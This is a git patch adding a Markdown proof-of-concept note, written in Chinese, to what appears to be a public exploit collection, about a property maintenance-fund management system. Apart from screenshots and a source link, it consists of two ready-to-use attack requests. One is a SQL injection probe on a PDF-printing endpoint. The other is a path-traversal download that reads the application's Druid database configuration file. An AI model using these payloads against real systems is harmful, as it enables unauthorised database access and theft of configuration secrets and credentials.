From bf6231ffcaf5bc809c7409a03ebf55d2cd7f9ad8 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 12 Apr 2024 20:58:56 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E7=89=A9=E4=B8=9A=E4=B8=93=E9=A1=B9?=
 =?UTF-8?q?=E7=BB=B4=E4=BF=AE=E8=B5=84=E9=87=91=E7=AE=A1=E7=90=86=E7=B3=BB?=
 =?UTF-8?q?=E7=BB=9F=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 物业专项维修资金管理系统漏洞.md | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 物业专项维修资金管理系统漏洞.md

diff --git a/物业专项维修资金管理系统漏洞.md b/物业专项维修资金管理系统漏洞.md
new file mode 100644
index 0000000..be0a1a2
--- /dev/null
+++ b/物业专项维修资金管理系统漏洞.md
@@ -0,0 +1,23 @@
+## 物业专项维修资金管理系统漏洞
+利用条件：所有漏洞均需要普通用户权限
+
+## sql注入漏洞
+```
+/property/propertyRightAlteration/printManyPdf?id=1+and+1=1a
+```
+
+![81a445dd5c9a5cf1b569dd4216b1bec8](https://github.com/wy876/POC/assets/139549762/9210a9de-0bfe-4772-84bf-4d2873425569)
+
+![3fb59376b871a4fa375e8b3e6c440067](https://github.com/wy876/POC/assets/139549762/8716165d-9b8c-4ba4-95f2-9fe674267595)
+
+
+## 文件读取漏洞
+```
+/common/download?fileName=../../wxzj/application-druid.yml
+```
+
+![6605ac7e553fc1d894fa7bc3dceb66b3](https://github.com/wy876/POC/assets/139549762/eccbbbf9-7d99-400e-8e96-8e3673b0e45c)
+
+
+## 漏洞来源
+- https://mp.weixin.qq.com/s/wNCafw5pBGTnUEVUoDjbtg